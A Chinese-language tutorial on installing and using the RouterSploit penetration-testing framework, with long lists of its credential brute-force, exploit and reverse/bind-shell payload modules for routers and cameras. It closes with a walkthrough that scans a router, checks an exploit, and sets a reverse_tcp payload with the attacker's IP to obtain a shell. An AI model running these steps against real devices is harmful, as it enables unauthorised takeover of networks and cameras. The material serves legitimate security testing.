routerSploit是一款专门针对路由器和嵌入式设备的漏洞测试工具,它提供了一套用于扫描、发现和利用路由器和嵌入式设备漏洞的功能。该工具使用Python编写,并集成了大量针对路由器和相关设备的漏洞利用模块,用户可以利用这些模块来进行渗透测试和安全评估。RouterSploit支持通过简单的命令行界面进行操作,并提供了丰富的功能,包括扫描、漏洞利用、暴力破解等,使用户能够快速、有效地评估目标设备的安全性。
RouterSploit的主要功能包括:
- 扫描功能:能够对目标路由器或嵌入式设备进行端口扫描、服务识别和漏洞扫描,帮助用户快速了解设备的安全状况。
- 漏洞利用:集成了大量针对路由器和嵌入式设备的漏洞利用模块,用户可以利用这些模块对已知的漏洞进行利用,以验证设备的安全性或进行渗透测试。
- 暴力破解功能:支持对路由器和相关设备的认证凭据进行暴力破解,帮助评估设备的认证机制是否安全。
- 模块化框架:具有模块化的设计结构,用户可以轻松添加新的漏洞利用模块或扩展现有功能,以适应不断变化的安全需求。
一.kali安装
1.1安装RouterSploit
默认情况下RouterSploit没有安装,在终端中输入routersploit命令后,系统自动提示安装,输入"Y"然后输入kali账号的密码即可自动进行安装。
也可以克隆安装:
git clone https://github.com/reverse-shell/routersploit
图片
后面执行显示出错还需要安装一些需要的依赖包
pip install pycryptodome
1.2启动RouterSploit
在终端中输入routersploit即可开启RouterSploit框架。
图片
二.RouterSploit主要命令
2.1基本命令
1.help命令
显示帮助信息
图片
set:设置模块的参数,例如set RHOST 192.168.1.1设置目标主机。
2.show命令
info:显示模块的基本信息和描述。
options:显示模块的可配置选项和参数。
advanced:显示模块的高级选项和参数。
devices:显示已知设备的信息。
all:显示所有可用的模块。
encoders:显示可用的编码器。
creds:显示已经捕获的凭证。
exploits:显示可用的漏洞利用模块。
scanners:显示可用的扫描模块。
wordlists:显示可用的字典文件。
图片
show all显示所有的
generic/upnp/ssdp_msearch
generic/bluetooth/btle_write
generic/bluetooth/btle_scan
generic/bluetooth/btle_enumerate
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
scanners/autopwn
scanners/routers/router_scan
scanners/misc/misc_scan
scanners/cameras/camera_scan
encoders/php/hex
encoders/php/base64
encoders/python/hex
encoders/python/base64
creds/routers/netsys/telnet_default_creds
creds/routers/netsys/ftp_default_creds
creds/routers/netsys/ssh_default_creds
creds/routers/netcore/telnet_default_creds
creds/routers/netcore/ftp_default_creds
creds/routers/netcore/ssh_default_creds
creds/routers/ipfire/telnet_default_creds
creds/routers/ipfire/ftp_default_creds
creds/routers/ipfire/ssh_default_creds
creds/routers/technicolor/telnet_default_creds
creds/routers/technicolor/ftp_default_creds
creds/routers/technicolor/ssh_default_creds
creds/routers/3com/telnet_default_creds
creds/routers/3com/ftp_default_creds
creds/routers/3com/ssh_default_creds
creds/routers/2wire/telnet_default_creds
creds/routers/2wire/ftp_default_creds
creds/routers/2wire/ssh_default_creds
creds/routers/thomson/telnet_default_creds
creds/routers/thomson/ftp_default_creds
creds/routers/thomson/ssh_default_creds
creds/routers/huawei/telnet_default_creds
creds/routers/huawei/ftp_default_creds
creds/routers/huawei/ssh_default_creds
creds/routers/zte/telnet_default_creds
creds/routers/zte/ftp_default_creds
creds/routers/zte/ssh_default_creds
creds/routers/fortinet/telnet_default_creds
creds/routers/fortinet/ftp_default_creds
creds/routers/fortinet/ssh_default_creds
creds/routers/juniper/telnet_default_creds
creds/routers/juniper/ftp_default_creds
creds/routers/juniper/ssh_default_creds
creds/routers/pfsense/webinterface_http_form_default_creds
creds/routers/pfsense/ssh_default_creds
creds/routers/zyxel/telnet_default_creds
creds/routers/zyxel/ftp_default_creds
creds/routers/zyxel/ssh_default_creds
creds/routers/cisco/telnet_default_creds
creds/routers/cisco/ftp_default_creds
creds/routers/cisco/ssh_default_creds
creds/routers/ubiquiti/telnet_default_creds
creds/routers/ubiquiti/ftp_default_creds
creds/routers/ubiquiti/ssh_default_creds
creds/routers/asus/telnet_default_creds
creds/routers/asus/ftp_default_creds
creds/routers/asus/ssh_default_creds
creds/routers/movistar/telnet_default_creds
creds/routers/movistar/ftp_default_creds
creds/routers/movistar/ssh_default_creds
creds/routers/asmax/telnet_default_creds
creds/routers/asmax/ftp_default_creds
creds/routers/asmax/webinterface_http_auth_default_creds
creds/routers/asmax/ssh_default_creds
creds/routers/bhu/telnet_default_creds
creds/routers/bhu/ftp_default_creds
creds/routers/bhu/ssh_default_creds
creds/routers/belkin/telnet_default_creds
creds/routers/belkin/ftp_default_creds
creds/routers/belkin/ssh_default_creds
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ftp_default_creds
creds/routers/dlink/ssh_default_creds
creds/routers/comtrend/telnet_default_creds
creds/routers/comtrend/ftp_default_creds
creds/routers/comtrend/ssh_default_creds
creds/routers/tplink/telnet_default_creds
creds/routers/tplink/ftp_default_creds
creds/routers/tplink/ssh_default_creds
creds/routers/billion/telnet_default_creds
creds/routers/billion/ftp_default_creds
creds/routers/billion/ssh_default_creds
creds/routers/netgear/telnet_default_creds
creds/routers/netgear/ftp_default_creds
creds/routers/netgear/ssh_default_creds
creds/routers/mikrotik/telnet_default_creds
creds/routers/mikrotik/api_ros_default_creds
creds/routers/mikrotik/ftp_default_creds
creds/routers/mikrotik/ssh_default_creds
creds/routers/linksys/telnet_default_creds
creds/routers/linksys/ftp_default_creds
creds/routers/linksys/ssh_default_creds
creds/generic/snmp_bruteforce
creds/generic/ftp_default
creds/generic/telnet_default
creds/generic/http_basic_digest_default
creds/generic/ssh_bruteforce
creds/generic/ssh_default
creds/generic/http_basic_digest_bruteforce
creds/generic/telnet_bruteforce
creds/generic/ftp_bruteforce
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ftp_default_creds
creds/cameras/cisco/ssh_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/honeywell/ssh_default_creds
exploits/routers/netsys/multi_rce
exploits/routers/netcore/udp_53413_rce
exploits/routers/ipfire/ipfire_proxy_rce
exploits/routers/ipfire/ipfire_oinkcode_rce
exploits/routers/ipfire/ipfire_shellshock
exploits/routers/technicolor/tc7200_password_disclosure_v2
exploits/routers/technicolor/tc7200_password_disclosure
exploits/routers/technicolor/tg784_authbypass
exploits/routers/technicolor/dwg855_authbypass
exploits/routers/multi/misfortune_cookie
exploits/routers/multi/rom0
exploits/routers/multi/tcp_32764_rce
exploits/routers/multi/tcp_32764_info_disclosure
exploits/routers/multi/gpon_home_gateway_rce
exploits/routers/3com/officeconnect_rce
exploits/routers/3com/ap8760_password_disclosure
exploits/routers/3com/imc_path_traversal
exploits/routers/3com/officeconnect_info_disclosure
exploits/routers/3com/imc_info_disclosure
exploits/routers/2wire/gateway_auth_bypass
exploits/routers/2wire/4011g_5012nv_path_traversal
exploits/routers/thomson/twg849_info_disclosure
exploits/routers/thomson/twg850_password_disclosure
exploits/routers/huawei/e5331_mifi_info_disclosure
exploits/routers/huawei/hg530_hg520b_password_disclosure
exploits/routers/huawei/hg866_password_change
exploits/routers/huawei/hg520_info_disclosure
exploits/routers/zte/f460_f660_backdoor
exploits/routers/zte/zxv10_rce
exploits/routers/zte/zxhn_h108n_wifi_password_disclosure
exploits/routers/fortinet/fortigate_os_backdoor
exploits/routers/zyxel/zywall_usg_extract_hashes
exploits/routers/zyxel/p660hn_t_v2_rce
exploits/routers/zyxel/d1000_rce
exploits/routers/zyxel/p660hn_t_v1_rce
exploits/routers/zyxel/d1000_wifi_password_disclosure
exploits/routers/cisco/ucm_info_disclosure
exploits/routers/cisco/firepower_management60_path_traversal
exploits/routers/cisco/ucs_manager_rce
exploits/routers/cisco/secure_acs_bypass
exploits/routers/cisco/dpc2420_info_disclosure
exploits/routers/cisco/unified_multi_path_traversal
exploits/routers/cisco/ios_http_authorization_bypass
exploits/routers/cisco/firepower_management60_rce
exploits/routers/cisco/catalyst_2960_rocem
exploits/routers/ubiquiti/airos_6_x
exploits/routers/asus/asuswrt_lan_rce
exploits/routers/asus/rt_n16_password_disclosure
exploits/routers/asus/infosvr_backdoor_rce
exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
exploits/routers/asmax/ar_804_gu_rce
exploits/routers/asmax/ar_1004g_password_disclosure
exploits/routers/bhu/bhu_urouter_rce
exploits/routers/belkin/n150_path_traversal
exploits/routers/belkin/g_plus_info_disclosure
exploits/routers/belkin/g_n150_password_disclosure
exploits/routers/belkin/play_max_prce
exploits/routers/belkin/auth_bypass
exploits/routers/belkin/n750_rce
exploits/routers/dlink/multi_hedwig_cgi_exec
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/dwl_3200ap_password_disclosure
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dir_300_645_815_upnp_rce
exploits/routers/dlink/dcs_930l_auth_rce
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dsl_2750b_rce
exploits/routers/dlink/multi_hnap_rce
exploits/routers/dlink/dwr_932_info_disclosure
exploits/routers/dlink/dvg_n5402sp_path_traversal
exploits/routers/dlink/dir_8xx_password_disclosure
exploits/routers/dlink/dwr_932b_backdoor
exploits/routers/dlink/dir_645_815_rce
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/dlink/dsp_w110_rce
exploits/routers/dlink/dir_815_850l_rce
exploits/routers/dlink/dir_300_600_rce
exploits/routers/dlink/dir_300_320_600_615_info_disclosure
exploits/routers/dlink/dgs_1510_add_user
exploits/routers/dlink/dsl_2750b_info_disclosure
exploits/routers/dlink/dir_850l_creds_disclosure
exploits/routers/dlink/dir_825_path_traversal
exploits/routers/dlink/dir_300_320_615_auth_bypass
exploits/routers/dlink/dns_320l_327l_rce
exploits/routers/dlink/dsl_2730_2750_path_traversal
exploits/routers/comtrend/ct_5361t_password_disclosure
exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
exploits/routers/tplink/wdr740nd_wdr740n_backdoor
exploits/routers/tplink/archer_c2_c20i_rce
exploits/routers/billion/billion_7700nr4_password_disclosure
exploits/routers/billion/billion_5200w_rce
exploits/routers/shuttle/915wm_dns_change
exploits/routers/netgear/jnr1010_path_traversal
exploits/routers/netgear/dgn2200_ping_cgi_rce
exploits/routers/netgear/multi_rce
exploits/routers/netgear/prosafe_rce
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
exploits/routers/netgear/r7000_r6400_rce
exploits/routers/netgear/multi_password_disclosure-2017-5521
exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
exploits/routers/netgear/n300_auth_bypass
exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
exploits/routers/mikrotik/routeros_jailbreak
exploits/routers/linksys/wrt100_110_rce
exploits/routers/linksys/smartwifi_password_disclosure
exploits/routers/linksys/eseries_themoon_rce
exploits/routers/linksys/1500_2500_rce
exploits/routers/linksys/wap54gv3_rce
exploits/generic/ssh_auth_keys
exploits/generic/heartbleed
exploits/generic/shellshock
exploits/misc/asus/b1m_projector_rce
exploits/misc/wepresent/wipg1000_rce
exploits/misc/miele/pg8528_path_traversal
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/P2P_wificam_rce
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/cisco/video_surv_path_traversal
exploits/cameras/jovision/jovision_credentials_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/mvpower/dvr_jaws_rce
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
3.run
执行当前模块来利用目标设备。
4.use命令
use :选择要使用的模块,例如漏洞利用模块、扫描模块等。例如use scanners/autopwn
5.执行指定的命令
exec :在shell中执行指定的命令,可以用于执行系统命令等。
在RouterSploit中,exec命令可以用于执行特定的系统命令。您可以使用exec命令来执行各种操作系统命令和工具,包括但不限于以下内容:
(1)执行系统命令
exec run ifconfig
这个例子会在目标设备上执行ifconfig命令,显示网络接口的配置信息。
(2)执行其他工具:
exec run nmap -sP 192.168.0.1/24
这个例子会在目标设备上执行nmap扫描命令,对指定网段进行主机存活性检测。
(3)执行自定义脚本
exec run /path/to/custom_script.sh arg1 arg2
这个例子会在目标设备上执行自定义的Shell脚本,并传入参数arg1和arg2。
6.search 搜索命令
search :搜索符合特定关键词的模块。
7.退出和返回
exit:退出RouterSploit工具。
back:返回上一级菜单。
2.2扫描结果中符号
RouterSploit扫描过程及结果中会有三个符号[+]、[-]、[*],特定的含义如下:
[+] 表示存在漏洞:扫描结果表明目标系统存在一个或多个已知的安全漏洞。
[-] 表示漏洞不存在:扫描结果表明目标系统未发现任何已知的安全漏洞。
[*] 表示无法确定:扫描结果表明无法确定目标系统是否存在已知的安全漏洞,可能由于扫描条件不足或存在其他未知因素。
三.RouterSploit利用流程
3.1RouterSploit扫描路由器漏洞
1.确认路由器地址
tracert www.sina.com.cn
第一个结果就是本地路由器地址。
3.2.扫描路由器
use scanners/autopwn
show options
set RHOST 192.168.1.1
run
3.3.对漏洞进行检查
use exploits/routers/3com/officeconnect_rce
set target 192.168.31.1
check
3.4.漏洞利用
1.配置playload
可以使用的playload列表(show all命令获取),网上很多文章通过show playloads命令来获取,kali环境执行未发现,有可能是python版本有。
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
(1)选择对应的payload
use payloads/x64/reverse_tcp
(2)查看配置
show options
(3)设置payload
set lhost [你的ip]
(4)再次查看配置
show options
(5)开始攻击
run
如果存在可利用的漏洞则反弹shell
